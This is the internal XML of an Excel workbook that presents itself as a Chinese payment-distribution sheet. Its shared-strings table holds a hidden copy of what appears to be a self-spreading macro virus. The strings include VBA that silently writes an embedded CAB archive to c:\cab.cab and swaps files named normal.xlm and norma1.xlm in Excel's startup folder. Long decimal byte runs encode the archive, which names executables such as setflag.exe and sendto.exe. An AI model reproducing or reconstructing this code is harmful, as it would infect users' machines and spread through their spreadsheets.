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8800" windowHeight="12375" tabRatio="638" firstSheet="1" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="Recovered_Sheet1" sheetId="1" state="hidden" r:id="rId1"/>
    <sheet name="发放明细表" sheetId="2" r:id="rId2"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId3"/>
  </externalReferences>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">发放明细表!$A$2:$XEW$2659</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="1">发放明细表!#REF!</definedName>
    <definedName name="否">[1]选项!$F$2:$F$8</definedName>
    <definedName name="是">[1]选项!$E$2:$E$9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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="18616" uniqueCount="7047">
  <si>
    <t xml:space="preserve">77 83 67 70 0 0 0 0 157 27 1 0 0 0 0 0 48 24 0 0 0 0 0 0 3 1 1 0 5 0 4 0 247 20 0 0 0 24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t>
  </si>
  <si>
    <t>Private Sub createcabfile()</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>Dim ch As Byte</t>
  </si>
  <si>
    <t>on error resume next</t>
  </si>
  <si>
    <t>Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t>Set w = CreateObject("wscript.shell")</t>
  </si>
  <si>
    <t>myfolder = w.specialfolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t>If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t>fso.createfolder myfolder</t>
  </si>
  <si>
    <t>End If</t>
  </si>
  <si>
    <t>For i=1 to Workbooks.Count</t>
  </si>
  <si>
    <t>If Workbooks(i).name="normal.xlm" then</t>
  </si>
  <si>
    <t>workbooks(i).close</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 186 24 0 0 8 0 1 0 0 128 0 0 0 0 0 0 0 0 225 48 244 104 32 0 115 101 116 102 108 97 103 46 101 120 101 0 0 96 0 0 0 128 0 0 0 0 232 48 135 172 32 0 105 110 116 101 114 110 101 116 46 101 120 101 0 0 18 1 0 0 224 0 0 0 0 232 48 177 180 32 0 110 111 114 109 97 49 46 120 108 109 0 0 158 1 0 0 242 1 0 0 0 232 48 109 144 32 0 110 111 114 109 97 108 46 100 111 116 0 0 80 0 0 0 144 3 0 0 0 229 48 54 95 32 0 115 101 110 100 116 111 46 101 120 101 0 93 3 165 99 72 50 0 128 67 75 236 58 109 116 20 85 150 85 93 213 73 37 169 166 11 236 196 0 65 90 44 92 152 48 28 156 14 14 216 129 105 52 221 9 199 4 58 132 116 19 49 9 40 196 216 43 200 36 85 160 78 26 59 84 218 77 229 209 154 221 163 206 236 142 103 143 46 58 198 115 156 213 61 58 51 56 199 29 187 19 76 2 202 71 24 151 201 12 179 10 234 226 203 20 106 28 178 157 206 208 80 123 95 85 135 4 231 99 119 127 204 191 188 115 94 223 170 247 238 123 239 222 251 238 103 37 85 247 116 83 12 69 81 44 116 93 167 168 195 148 217 60 212 255 222 6 161 207 90 248 243 89 212 155 57 199 111 62 76 87 30 191 121 115 243 131 173 206 61 45 15 63 208 178 125 151 243 254 237 187 119 63 44 57 239 219 233 108 145 119 59 31 220 237 44 219 88 227 220 245 240 142 157 203 109 182 92 49 179 199 227 53 76 212 253 173 93 103 38 251 47 191 249 192 153 60 128 135 151 223 127 230 91 198 216 67 103 110 4 88 247 205 253 103 86 25 243 77 103 214 2 220 244 224 253 205 4 127 146 22 191 151 162 42 105 134 154 255 220 39 215 72 63 71 217 233 60 58 11 38 225 101 133 57 22 190 17 126 4 232 219 50 92 10 230 59 155 89 51 9 169 238 12 30 52 198 248 21 50 239 194 181 113 97 154 44 </t>
  </si>
  <si>
    <t>fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">28 59 40 106 201 255 65 102 255 239 6 116 190 254 23 166 151 75 59 31 145 0 238 189 51 67 144 255 107 132 65 115 194 46 203 91 118 108 151 182 83 212 7 217 25 222 175 201 96 170 129 52 60 203 77 52 106 112 62 252 236 201 224 237 249 35 188 248 95 131 213 153 54 211 102 218 76 155 105 51 109 166 205 180 153 54 211 102 218 76 155 105 127 189 166 92 44 65 101 98 105 77 109 0 85 176 65 87 178 217 179 199 67 85 171 146 184 172 191 76 156 47 96 31 212 139 8 135 232 208 178 90 252 36 148 210 181 33 58 182 89 92 17 162 55 225 239 91 97 170 76 92 181 88 135 125 18 231 44 126 188 15 70 2 40 21 170 172 85 219 68 9 55 0 126 0 223 7 131 106 135 216 65 25 216 149 202 145 85 29 241 189 34 250 8 118 10 177 53 184 218 220 69 84 142 8 104 208 215 126 158 108 166 244 177 238 175 218 62 116 157 237 136 171 247 138 69 246 39 158 130 65 216 210 137 54 139 206 16 133 44 158 196 185 28 127 45 190 66 214 74 226 150 24 162 44 148 65 117 41 190 4 21 60 122 15 165 208 144 90 38 222 155 24 177 92 122 137 48 136 142 41 231 25 255 165 23 241 32 153 175 20 183 193 241 205 100 85 204 145 183 9 191 111 14 150 1 166 71 73 176 202 17 81 173 132 211 42 69 135 199 164 168 189 143 224 186 19 176 103 145 253 160 172 235 122 136 10 173 168 197 223 179 78 138 164 44 196 110 194 29 172 201 100 8 228 145 99 29 131 37 64 101 48 131 83 41 86 132 216 106 188 141 224 108 22 253 100 168 76 148 66 172 95 125 218 144 14 246 153 84 180 41 71 42 80 226 31 219 63 214 105 138 98 122 81 42 161 231 0 21 52 21 1 17 44 123 148 91 223 126 148 186 170 235 235 36 107 57 25 64 227 137 11 57 1 114 99 120 156 49 54 40 10 81 235 208 112 226 124 78 117 45 254 13 236 9 162 141 234 251 75 209 165 73 158 3 248 44 99 16 177 4 136 189 23 4 202 118 3 99 203 50 82 125 217 88 82 212 222 79 80 55 202 199 64 194 75 92 113 247 40 225 29 186 211 254 228 5 160 182 9 </t>
  </si>
  <si>
    <t xml:space="preserve">241 76 19 218 204 88 154 64 84 69 228 84 37 206 182 79 68 201 148 10 215 36 111 204 32 176 48 14 40 171 200 104 17 185 192 174 74 198 210 89 41 138 176 70 44 30 34 130 142 149 9 105 152 41 74 246 211 82 193 59 43 64 3 99 37 140 235 244 165 31 73 14 130 68 8 96 18 12 28 237 238 111 251 59 237 111 97 108 21 2 206 149 68 150 235 236 52 73 37 82 57 232 84 226 227 156 226 99 176 89 169 251 87 225 185 176 178 50 86 242 172 178 246 138 68 223 229 30 150 184 59 149 126 214 253 171 182 47 204 75 66 142 238 59 1 159 25 218 84 139 255 141 49 111 169 76 252 155 16 237 199 223 167 13 33 192 81 149 213 248 105 139 33 173 178 77 184 11 158 106 241 46 138 252 206 166 12 209 186 226 141 13 245 91 149 35 37 125 221 208 2 112 36 23 84 78 234 200 199 247 120 36 171 50 168 107 119 244 40 82 73 0 183 80 134 117 96 1 204 66 223 43 224 90 43 89 207 71 227 97 43 224 107 115 144 175 40 26 151 242 252 216 70 38 154 138 168 58 52 160 52 241 84 99 67 159 177 107 52 41 231 4 240 223 195 46 117 48 130 111 129 135 104 188 206 56 162 161 47 233 179 121 36 59 217 246 183 176 122 124 184 174 97 126 188 207 21 111 232 171 33 107 121 215 217 32 16 132 6 193 8 34 19 22 249 219 77 175 112 180 116 27 242 113 104 109 113 10 148 227 214 160 159 172 29 55 73 114 15 200 179 8 253 17 105 150 120 69 245 241 90 182 178 129 119 42 239 1 83 156 210 196 82 106 86 35 234 107 216 218 23 162 177 133 144 3 135 128 235 112 157 117 233 171 87 198 145 135 218 95 245 194 225 239 121 64 173 94 7 134 86 161 10 62 153 80 164 21 74 155 40 208 178 221 143 151 131 249 40 41 189 78 90 112 151 54 143 140 82 242 13 201 132 69 154 229 199 55 100 166 100 75 94 202 231 54 54 107 123 195 88 136 250 36 11 26 104 132 83 107 209 197 106 56 16 133 121 251 107 97 1 121 57 53 156 142 234 170 151 67 31 201 217 174 248 200 113 226 105 100 71 211 184 143 231 105 137 67 190 66 213 235 </t>
  </si>
  <si>
    <t>Next</t>
  </si>
  <si>
    <t xml:space="preserve">208 178 7 188 14 242 49 11 109 224 219 207 115 112 187 210 82 228 99 129 190 69 238 97 116 185 197 130 82 65 93 230 244 219 241 99 28 69 45 221 207 210 107 65 16 197 31 209 97 78 243 185 235 29 45 190 232 81 41 47 128 127 12 150 7 82 151 31 85 194 14 74 178 161 62 215 233 113 217 129 46 23 255 65 179 160 203 198 22 32 199 215 12 19 226 129 19 169 156 246 114 197 195 238 129 150 181 40 156 214 150 2 185 1 251 47 40 63 254 61 104 65 157 33 133 229 186 151 16 121 55 80 25 141 63 78 232 164 201 213 158 181 71 253 32 13 228 21 128 233 163 125 228 6 144 55 13 167 12 20 27 135 242 218 103 186 36 178 248 35 11 185 129 16 13 47 28 102 243 224 165 238 235 34 170 231 208 73 144 80 56 173 86 113 134 136 94 249 147 34 226 51 34 210 24 84 197 101 230 190 97 10 233 22 247 32 154 48 133 116 123 13 14 66 80 88 26 230 38 165 196 124 68 88 187 219 93 229 104 89 78 196 130 18 82 142 41 150 68 113 175 191 134 8 228 229 188 140 174 75 183 19 161 124 123 169 151 99 134 181 194 0 254 73 46 76 16 41 44 233 100 128 140 187 244 42 14 72 81 194 28 101 143 238 189 158 125 65 99 13 33 12 184 78 23 123 57 34 128 255 50 173 141 168 170 34 61 12 46 193 17 213 165 92 69 167 193 40 116 139 92 47 126 9 207 160 191 178 45 128 127 54 139 162 232 50 209 81 231 210 3 248 179 180 78 12 180 14 52 60 91 76 19 13 119 244 208 146 208 195 73 124 242 8 43 103 15 248 10 137 243 11 130 76 29 132 252 115 54 131 124 215 81 32 213 254 76 98 61 74 104 182 1 107 247 94 15 85 64 156 192 160 14 54 138 23 204 38 6 41 211 125 126 88 38 76 118 252 172 221 112 19 125 33 15 188 242 164 227 33 162 229 71 120 114 77 33 189 249 245 109 30 170 57 114 155 135 218 241 130 241 37 123 135 186 216 140 204 2 92 161 186 19 235 249 44 96 184 78 119 125 160 230 247 192 145 104 208 140 73 170 237 69 120 75 156 231 152 99 170 237 121 242 136 133 67 207 1 12 81 120 79 </t>
  </si>
  <si>
    <t xml:space="preserve">33 232 1 16 195 133 138 240 63 17 19 85 118 166 41 252 26 80 171 231 111 129 221 14 29 1 203 194 187 242 41 234 80 4 86 224 130 27 32 254 108 153 3 63 151 224 166 94 56 12 99 135 222 134 31 191 190 242 117 0 250 202 87 9 214 201 113 131 110 213 251 169 31 167 0 15 121 47 34 14 229 168 85 231 252 213 248 89 193 80 61 4 4 203 231 240 239 200 133 175 233 132 85 22 201 138 191 152 11 7 19 101 189 105 30 69 53 19 226 245 252 50 112 243 128 63 133 116 116 18 105 2 30 234 50 88 28 16 59 233 254 36 49 128 119 207 55 24 11 72 185 126 28 35 207 224 11 67 64 95 228 49 160 50 159 7 108 112 121 181 160 250 160 12 238 53 207 131 23 178 43 79 16 109 31 128 56 153 178 42 23 22 198 138 162 207 3 114 226 2 131 152 100 217 10 150 150 30 12 98 251 226 140 26 150 94 211 158 130 144 5 167 68 138 10 209 8 227 47 225 161 206 253 110 157 84 20 196 159 144 103 191 158 239 128 195 64 196 185 122 190 0 79 8 107 22 215 231 65 124 55 204 34 166 46 178 99 5 75 69 63 151 114 106 113 255 34 192 215 242 93 113 205 161 44 126 26 152 165 76 213 201 153 84 157 250 173 38 135 166 30 47 0 45 156 171 239 229 112 22 104 73 83 123 19 63 126 217 21 175 83 179 84 31 167 250 216 134 62 8 93 172 219 74 56 107 93 131 6 33 224 77 88 149 143 23 34 62 70 184 74 150 13 1 67 139 253 120 109 134 200 66 147 72 206 36 18 72 140 131 13 206 57 68 200 184 142 10 162 139 237 23 29 36 3 169 226 106 220 54 178 127 32 104 87 30 5 95 132 18 232 171 63 150 93 23 200 174 135 182 119 4 1 3 28 127 88 80 195 41 53 60 106 248 23 50 214 227 148 248 144 37 88 141 15 229 26 198 131 24 166 63 233 97 35 246 142 4 185 15 47 79 150 120 211 106 152 179 63 241 25 140 196 162 23 47 131 85 86 165 139 171 120 119 149 208 186 20 30 117 111 186 43 39 50 145 43 103 235 222 209 126 202 230 233 228 60 104 48 246 12 193 44 62 214 62 65 254 92 211 246 62 </t>
  </si>
  <si>
    <t>If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t xml:space="preserve">74 153 107 139 83 49 239 88 136 242 155 111 65 63 98 244 146 21 122 126 145 33 2 233 46 228 29 163 189 41 247 64 91 30 248 209 98 47 239 246 10 45 93 46 240 48 48 102 143 34 32 97 117 152 147 26 67 214 45 171 189 156 92 57 37 30 67 90 35 17 67 31 137 20 33 212 104 3 177 170 177 96 181 46 11 186 204 235 83 135 192 214 99 192 145 234 77 105 47 79 33 63 7 97 1 191 227 36 106 176 198 84 58 143 196 131 4 34 171 230 217 59 142 67 68 49 207 42 34 70 189 134 28 166 21 20 123 71 255 156 186 128 55 124 129 4 198 64 8 226 69 131 156 125 152 184 42 45 203 221 31 206 70 253 135 200 12 228 148 248 49 162 117 135 72 24 38 225 234 230 16 27 80 141 112 138 183 95 55 193 133 230 225 205 224 13 235 92 71 15 251 193 34 81 62 153 81 217 217 74 220 9 153 240 154 83 45 16 129 127 231 58 253 214 54 50 217 139 126 111 42 2 98 13 69 64 236 40 113 231 16 33 100 70 201 209 149 132 243 206 246 137 56 96 182 125 0 14 241 63 193 93 68 214 156 34 44 72 214 145 38 56 151 104 25 36 36 50 79 146 145 6 161 231 128 189 227 18 176 213 227 177 71 53 2 33 253 35 249 69 143 96 239 56 75 148 100 3 39 94 85 103 129 127 6 124 50 161 236 228 41 241 75 222 210 244 10 111 248 245 69 237 87 247 192 105 18 215 126 181 27 160 156 87 131 127 184 200 72 139 228 236 0 174 36 156 146 56 198 209 65 105 71 38 217 137 85 208 234 44 180 161 112 61 4 196 13 236 126 33 232 175 193 212 149 140 95 227 53 151 114 89 151 10 80 31 122 143 48 122 126 146 209 24 59 168 89 15 111 105 5 11 243 176 78 201 22 178 132 168 26 124 52 219 212 108 31 215 85 197 117 114 154 3 242 71 47 215 72 182 252 113 122 114 203 213 97 190 81 202 34 145 75 179 67 244 55 170 37 141 227 157 64 63 201 220 182 214 247 189 63 173 129 128 130 134 128 170 4 20 230 192 242 134 152 126 247 213 189 156 59 101 63 240 8 88 213 248 0 249 107 164 236 128 194 70 249 152 81 38 184 150 </t>
  </si>
  <si>
    <t>goto a1</t>
  </si>
  <si>
    <t xml:space="preserve">165 151 94 210 197 103 134 111 130 219 24 248 57 153 84 70 216 22 94 57 199 48 131 186 24 29 93 0 126 81 140 97 152 238 6 248 16 129 20 252 44 131 238 135 126 203 80 87 86 103 118 151 143 238 44 167 187 124 22 216 182 179 220 162 244 51 202 128 177 249 251 215 54 143 173 159 194 53 176 104 165 223 162 12 88 8 214 143 174 97 117 155 56 62 192 40 39 51 7 167 175 63 9 224 109 232 111 66 127 21 250 139 208 159 131 254 52 244 131 132 254 178 39 63 85 203 158 250 20 32 6 136 1 94 4 120 17 32 20 31 79 141 2 28 3 56 6 48 5 48 5 48 13 48 29 99 99 198 159 105 71 153 212 164 36 116 194 240 40 244 52 116 97 33 140 120 185 134 198 163 125 221 132 186 233 207 38 231 153 17 160 241 58 105 128 40 38 113 99 210 109 233 88 219 234 116 70 254 226 148 252 109 87 46 189 148 134 115 247 56 201 185 227 191 6 41 59 157 6 191 147 247 49 97 222 71 49 185 143 71 22 26 247 65 144 187 59 225 185 7 250 41 232 93 62 230 150 161 206 114 102 3 108 188 145 108 251 211 105 219 18 186 50 243 83 119 244 133 69 249 210 144 254 193 105 152 221 211 240 0 105 234 174 190 96 148 47 9 185 246 3 247 64 88 185 126 111 17 192 50 232 37 208 75 161 151 65 175 132 190 25 250 3 78 227 94 160 240 123 170 8 96 33 192 66 128 14 128 14 128 2 64 1 32 15 144 7 200 1 228 0 178 0 217 235 239 197 148 79 4 126 59 161 255 0 250 171 206 105 247 226 99 128 234 105 247 96 188 95 127 7 211 199 174 187 55 125 229 197 125 30 202 72 128 137 192 73 86 209 38 178 231 246 45 50 210 137 34 179 80 146 11 86 151 137 156 36 24 99 63 188 201 28 251 208 21 55 99 175 123 37 39 121 168 125 144 225 223 87 96 78 21 65 189 197 132 232 6 165 223 174 92 24 13 76 37 25 78 35 201 152 138 216 246 142 35 25 31 246 54 129 22 41 215 48 238 145 127 133 55 158 158 116 85 80 186 189 189 128 68 0 43 184 11 53 75 223 91 8 49 158 228 150 7 141 50 146 87 141 60 251 33 </t>
  </si>
  <si>
    <t xml:space="preserve">226 78 31 64 1 62 217 123 64 46 65 27 132 160 50 161 67 21 60 145 208 13 111 84 250 239 134 55 42 61 169 89 223 33 222 168 107 35 219 24 57 127 32 50 113 64 206 138 156 112 170 1 190 125 191 145 186 66 242 189 1 202 46 146 208 190 155 73 104 73 241 51 171 2 206 177 255 148 94 167 206 106 232 27 31 158 31 87 206 9 74 92 200 201 184 87 82 73 130 7 82 46 242 196 75 115 65 247 74 51 131 122 151 100 1 253 224 247 193 41 66 240 207 164 1 25 223 200 244 119 249 217 100 47 164 2 255 76 138 230 157 41 10 234 14 37 44 80 232 164 244 64 178 215 34 223 151 236 173 144 22 116 121 172 165 185 82 129 94 37 128 5 50 177 141 244 128 55 69 10 157 254 178 21 214 92 51 112 67 192 150 133 106 35 104 139 102 222 114 135 25 68 67 214 58 119 66 206 159 10 132 170 205 136 201 107 201 129 169 93 70 206 177 18 158 253 184 142 228 142 35 183 18 122 25 84 59 70 215 166 98 149 43 88 35 87 129 204 35 69 84 225 180 148 19 249 78 174 204 242 172 102 17 47 119 130 18 129 183 77 169 94 129 25 116 39 212 170 148 93 121 207 72 80 132 46 170 20 226 51 185 198 82 155 148 215 153 93 174 123 133 17 82 127 175 95 13 249 73 33 96 120 34 171 114 229 44 197 43 88 180 134 254 108 91 57 108 162 181 154 188 0 110 204 171 135 232 201 44 68 188 46 91 132 167 114 37 60 70 73 235 204 124 160 66 186 161 203 171 131 124 110 132 109 80 94 121 103 217 109 86 109 169 59 204 203 121 145 176 158 43 91 251 179 115 181 194 16 29 210 73 42 81 109 124 156 224 201 140 196 146 115 129 126 32 201 126 160 28 108 91 19 64 186 18 240 156 213 227 1 38 45 157 89 197 97 30 114 51 200 115 254 82 70 241 166 145 16 72 22 253 84 179 3 66 105 51 7 63 248 4 96 52 179 228 149 34 175 239 80 153 82 6 74 12 163 144 201 55 117 151 12 208 198 0 155 25 8 134 232 198 213 107 134 225 16 121 54 177 75 61 127 217 54 82 77 228 47 1 0 198 201 83 53 232 94 209 161 174 249 0 80 </t>
  </si>
  <si>
    <t xml:space="preserve">58 23 144 28 65 46 125 225 117 147 134 69 200 246 42 73 63 99 223 77 187 71 91 110 64 89 38 93 202 23 172 123 37 65 105 253 188 161 217 73 136 42 36 68 125 195 176 248 230 37 100 64 36 3 115 141 129 232 217 173 50 177 117 78 53 200 48 43 137 198 140 177 3 169 173 182 107 251 246 179 218 231 102 94 93 99 38 214 129 96 107 43 164 214 163 36 181 134 164 183 52 54 153 244 218 147 101 183 65 126 29 240 227 15 11 205 130 65 230 167 100 169 109 132 243 10 13 209 20 1 171 43 72 85 48 12 249 196 215 178 239 28 63 126 163 128 120 2 39 202 38 101 194 149 24 40 0 234 251 179 151 115 205 34 161 158 231 92 103 209 62 97 117 35 171 202 99 97 70 109 100 67 116 77 0 175 51 235 73 119 31 228 211 109 91 81 144 111 26 239 229 104 153 43 46 103 71 230 16 83 200 70 27 57 52 92 252 235 100 47 163 214 167 164 165 232 12 250 48 241 7 171 242 201 66 228 120 198 172 27 126 195 70 164 37 104 200 125 170 117 81 228 142 92 153 209 189 169 59 181 175 146 189 17 121 206 117 149 238 8 201 222 149 112 154 146 57 208 168 145 55 224 45 89 206 131 241 147 226 21 5 217 232 105 153 187 185 54 53 242 15 240 90 156 96 122 201 119 153 254 63 85 121 101 193 129 33 146 71 233 242 24 126 252 170 201 129 55 45 47 64 229 28 212 32 196 24 91 243 136 125 1 41 156 7 72 41 183 57 181 18 130 158 38 43 170 96 133 145 249 194 50 200 215 247 217 208 70 195 223 89 193 223 73 12 42 47 36 7 27 199 192 43 249 194 226 229 150 122 211 64 50 148 21 76 194 208 121 242 149 164 26 28 221 202 49 136 30 228 99 137 235 44 72 71 173 79 119 101 151 110 151 230 149 182 72 246 210 125 246 232 34 144 224 91 52 4 22 141 124 0 56 65 107 220 91 57 196 0 79 88 66 244 61 93 229 116 249 29 125 246 142 79 128 93 247 47 205 180 213 254 139 184 146 218 252 120 139 180 77 193 197 146 87 193 115 165 219 21 60 75 42 170 176 71 95 37 101 70 125 218 30 61 4 15 3 222 52 241 128 202 81 </t>
  </si>
  <si>
    <t>cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t xml:space="preserve">167 246 51 99 240 201 233 131 130 246 47 201 132 71 14 43 71 61 218 15 146 9 139 220 170 156 191 170 92 72 43 71 45 237 39 72 53 162 29 56 76 156 122 116 80 174 203 27 28 105 33 74 128 239 147 42 42 164 229 10 206 147 230 40 56 75 246 36 223 141 203 238 200 113 207 72 13 76 175 174 79 201 203 51 110 183 253 130 254 142 174 143 148 102 134 111 156 28 62 65 254 189 107 100 49 12 195 82 41 219 117 122 100 46 60 71 142 71 70 102 3 108 126 17 144 12 39 13 110 232 187 55 194 141 15 130 67 112 191 23 102 161 188 157 135 188 14 221 122 16 116 69 221 195 171 91 88 181 80 221 194 169 91 138 212 10 243 27 14 202 39 5 8 84 231 174 207 93 73 87 220 253 31 193 253 245 104 129 241 165 240 50 178 187 143 75 249 201 117 188 34 229 122 148 1 214 221 219 118 81 251 14 42 81 52 17 165 66 206 196 103 22 92 144 130 50 5 217 204 250 196 110 126 97 44 205 118 95 145 10 209 184 251 191 129 223 13 130 174 238 102 213 221 188 186 155 83 151 171 187 139 80 191 81 92 147 162 131 208 75 34 4 68 118 123 135 147 216 196 22 46 122 214 222 145 79 110 242 178 85 230 149 109 28 56 177 45 35 54 99 0 244 57 73 244 217 246 91 194 77 21 40 36 175 26 207 168 130 37 89 84 116 208 152 173 104 37 21 83 37 252 50 67 1 247 177 112 126 172 100 125 241 80 172 228 39 195 80 54 41 183 82 202 255 180 247 53 80 81 92 89 194 213 116 129 5 52 118 43 16 209 104 210 70 204 196 33 49 196 246 7 166 197 116 11 173 128 160 141 45 221 33 138 74 164 13 116 16 152 166 74 193 129 164 73 193 124 20 149 90 157 196 179 155 61 51 155 9 209 153 117 146 239 59 155 179 153 207 207 153 100 147 198 206 128 154 108 98 116 39 58 154 47 226 140 187 83 78 185 9 70 3 173 33 212 119 239 171 106 108 147 56 51 187 103 206 126 231 236 225 157 243 120 127 247 189 119 223 223 125 247 222 119 139 30 48 149 114 163 34 37 46 217 0 48 5 176 188 97 36 24 152 224 113 1 155 11 246 198 101 117 98 </t>
  </si>
  <si>
    <t>If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t xml:space="preserve">86 117 193 15 226 178 240 93 64 41 45 120 46 46 11 53 236 202 178 2 41 46 235 105 204 202 46 216 19 151 133 58 15 101 90 193 179 152 149 162 101 245 162 0 75 16 9 48 234 169 42 129 68 171 54 43 12 14 189 2 114 224 136 236 199 49 162 206 58 25 229 218 204 197 64 181 64 64 17 55 100 211 98 154 27 192 243 51 81 32 244 30 198 191 44 142 22 198 138 113 62 108 178 15 180 208 249 22 238 115 201 84 178 89 50 73 152 11 39 24 178 88 32 123 17 143 237 92 254 156 131 132 182 114 137 242 124 224 132 196 37 168 121 178 169 189 73 223 137 176 211 151 23 176 134 213 94 249 159 81 111 37 177 73 6 69 150 232 127 194 219 196 45 223 53 162 170 226 112 149 253 170 176 4 245 82 32 178 38 203 125 255 142 123 161 0 91 200 187 155 205 175 244 201 207 101 225 67 85 149 43 244 112 1 123 79 165 124 233 115 85 181 71 170 132 36 2 30 68 112 159 186 84 70 243 207 42 32 248 85 198 47 243 238 230 142 85 171 4 9 249 135 88 46 204 193 184 112 215 150 205 131 137 7 0 83 60 14 27 117 34 113 11 246 143 3 71 249 230 16 192 214 209 0 227 245 168 153 121 48 79 125 168 82 19 150 28 197 77 50 158 151 197 38 136 81 201 21 117 75 174 49 183 199 227 147 203 9 79 129 212 71 162 123 220 114 201 231 56 40 254 237 44 251 85 192 144 145 79 92 6 12 98 240 162 11 128 190 239 246 250 228 25 164 214 24 255 118 70 177 64 52 113 91 54 239 71 85 156 70 189 196 114 96 66 50 60 94 126 46 37 114 22 164 96 131 4 107 88 200 110 149 101 132 101 112 144 132 14 83 40 239 30 174 168 215 109 112 132 110 220 195 46 232 58 201 206 55 31 58 57 242 116 77 155 131 162 89 147 106 232 30 97 147 122 45 61 119 172 114 144 248 175 73 92 121 143 36 232 208 189 212 42 108 96 149 67 41 36 57 137 164 184 215 226 48 31 58 59 194 199 55 146 216 155 213 115 215 42 232 197 202 38 119 33 151 117 35 153 123 183 235 36 103 44 86 24 210 212 118 21 216 195 44 42 148 71 153 187 134 0 207 </t>
  </si>
  <si>
    <t>fso.delete cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">94 11 194 38 34 156 17 40 60 201 199 131 21 143 188 88 153 161 38 12 186 80 99 79 217 206 133 242 54 113 180 163 80 25 69 148 238 31 137 24 184 249 168 123 202 98 211 66 173 134 123 36 183 129 163 197 35 138 81 0 209 25 200 249 201 252 202 44 243 190 35 66 101 214 7 138 120 106 13 112 126 83 11 17 145 129 164 77 171 84 195 26 238 106 175 5 240 44 229 59 178 40 46 5 81 121 24 80 97 191 131 218 103 118 33 0 206 140 27 98 146 54 63 218 220 152 227 38 208 8 185 170 193 113 233 17 32 143 177 9 83 13 151 102 96 82 101 141 252 183 96 57 50 128 254 169 84 117 164 162 162 239 226 46 36 129 226 3 101 91 113 55 217 206 1 37 132 141 202 217 212 95 139 195 246 171 44 28 95 132 192 209 42 247 169 153 197 200 67 68 237 95 152 187 254 128 87 3 41 195 39 151 75 248 34 202 71 13 230 110 36 26 176 135 76 90 125 115 215 17 124 128 203 191 75 28 96 167 58 28 219 243 179 184 235 90 240 89 206 128 88 80 4 205 125 16 245 120 28 30 143 219 235 241 8 69 217 139 213 211 162 108 87 216 69 149 242 161 207 180 35 83 148 109 97 231 121 60 149 168 198 206 6 40 245 52 112 171 83 137 46 187 229 15 120 78 54 101 91 128 121 179 120 213 76 7 162 23 81 60 124 52 129 43 179 127 129 36 35 134 49 187 60 239 110 113 16 136 121 94 22 247 5 254 25 201 25 116 136 114 165 188 238 51 253 56 115 180 109 68 73 173 244 121 229 41 159 146 219 223 167 102 46 199 218 3 200 40 33 229 70 65 238 114 17 170 115 235 112 70 228 12 173 42 8 102 76 224 78 249 239 46 33 50 75 144 165 24 36 108 155 21 181 136 223 71 72 251 112 203 172 16 10 52 83 213 129 85 137 41 125 8 195 15 48 137 88 166 252 86 130 17 2 127 182 9 250 218 14 188 232 74 216 117 191 210 94 167 139 186 195 230 174 95 96 60 87 170 163 15 83 12 54 37 205 94 216 158 32 14 231 19 89 168 99 253 91 7 118 35 63 140 248 116 93 33 143 65 108 30 175 245 47 76 145 122 72 247 253 45 89 161 </t>
  </si>
  <si>
    <t>open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t xml:space="preserve">173 208 61 163 14 56 18 83 68 51 31 102 58 251 73 231 23 97 87 107 45 181 191 174 36 137 36 102 131 125 243 228 42 209 136 178 223 210 222 114 106 164 223 192 46 4 94 134 75 5 44 41 77 177 120 151 56 40 190 255 85 149 148 152 42 48 0 223 83 76 175 118 225 155 249 120 251 47 109 231 180 193 46 63 163 74 139 207 112 229 221 231 6 86 209 157 92 98 96 228 17 37 69 140 20 19 153 47 252 57 52 188 129 44 20 175 170 236 12 223 68 55 38 162 158 18 86 224 130 38 133 214 210 14 197 204 71 141 112 56 214 210 140 66 195 223 80 33 255 133 177 253 135 42 65 92 205 116 35 83 77 158 63 139 34 182 112 128 66 17 187 14 153 18 243 190 48 244 81 75 90 221 143 114 51 155 41 179 70 242 64 98 142 9 210 91 241 89 35 28 129 91 55 242 46 81 12 250 42 81 178 168 123 49 23 74 225 190 62 49 151 162 170 225 228 136 255 10 87 80 89 54 61 234 164 147 0 187 195 120 56 88 51 44 23 3 23 147 69 72 56 140 66 63 190 65 138 184 176 129 241 186 131 208 64 173 186 4 149 15 250 99 10 148 88 225 198 23 155 77 252 184 202 46 4 1 32 155 189 79 90 188 83 52 189 38 148 129 140 80 108 226 219 95 163 41 110 122 157 1 121 131 162 215 24 25 63 35 80 55 188 198 40 145 218 61 137 148 38 215 32 55 110 11 215 138 105 152 238 108 163 177 35 206 34 86 152 196 245 166 252 10 134 75 36 184 69 60 21 175 215 194 101 169 164 232 17 96 103 133 53 140 80 72 11 79 152 170 54 30 161 169 119 223 245 22 46 202 125 164 48 55 151 240 246 12 14 125 76 172 54 1 225 30 117 144 65 154 187 241 82 23 224 194 112 161 150 28 110 6 161 112 76 108 49 137 223 99 112 4 53 146 105 39 223 190 135 166 88 151 183 82 122 194 162 110 216 67 87 111 134 22 82 195 172 173 117 57 64 121 228 159 17 158 154 134 82 175 71 254 152 36 24 168 22 48 136 69 123 24 185 6 31 215 232 61 66 161 9 234 50 80 1 138 196 197 123 148 62 242 5 136 50 155 140 68 201 196 198 3 170 71 </t>
  </si>
  <si>
    <t>For i = 1 To 150</t>
  </si>
  <si>
